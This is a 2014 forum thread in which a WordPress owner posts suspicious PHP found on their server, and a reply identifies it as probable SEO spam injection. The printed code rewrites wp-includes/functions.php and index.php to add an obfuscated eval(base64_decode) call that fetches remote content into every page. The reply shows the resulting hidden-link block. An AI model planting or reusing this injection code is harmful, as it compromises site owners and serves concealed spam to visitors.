1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Is my website hacked ?

Discussion in 'Black Hat SEO' started by Ashgriel, Mar 24, 2014.

  1. Ashgriel

    Ashgriel Junior Member

    Joined:
    Jan 21, 2013
    Messages:
    168
    Likes Received:
    29
    Today I noticed that inside my wordpress directory is file named hacks.log and inside is something like this
    PHP:
    @$content file_get_contents("wp-includes/functions.php");
    $content str_replace('* Uses the "The Tortoise and the Hare" algorithm to detect loops.'
    ,"
    */
    function themeRender() {
        eval(base64_decode('echo @file_get_contents("
    http://www.beteks.com/links.php?url=".$_SERVER["SERVER_NAME"]);=='));
    }
    /*
    ",$content);

    @file_put_contents("wp-includes/functions.php",$content);


    $content = file_get_contents("index.php");
    if(!strstr($content,"themeRender")) {
        $content = str_replace('?>'
        ,"
    themeRender();
    ?>
        ",$content);

        file_put_contents("index.php",$content);
    }
    If so, what I can do ? Thank you

    Sorry if this is wrong section for this :(
     
  2. Schvamp

    Schvamp Power Member

    Joined:
    Feb 13, 2012
    Messages:
    684
    Likes Received:
    549
    Location:
    Hogwarts
    Most likely..
    Code:
    <div style='text-indent:-9999em'>
    <a href="http://www.bigbrotheralbania6.org" rel="follow">Big Brother Albania 6</a>
    <a href="http://www.hdwallpapers24.com" rel="follow">HD Wallpapers</a>
    <a href="http://www.couponstocks.com" rel="follow">click here</a>
    <a href="http://www.couponstocks.com" rel="follow">new coupons</a>
    </div>
    You said the code was found in hacks.log? Is LOG the extension? The code snippet needs to be called from somewhere, my best guess would be in function.php
     
    Last edited: Mar 24, 2014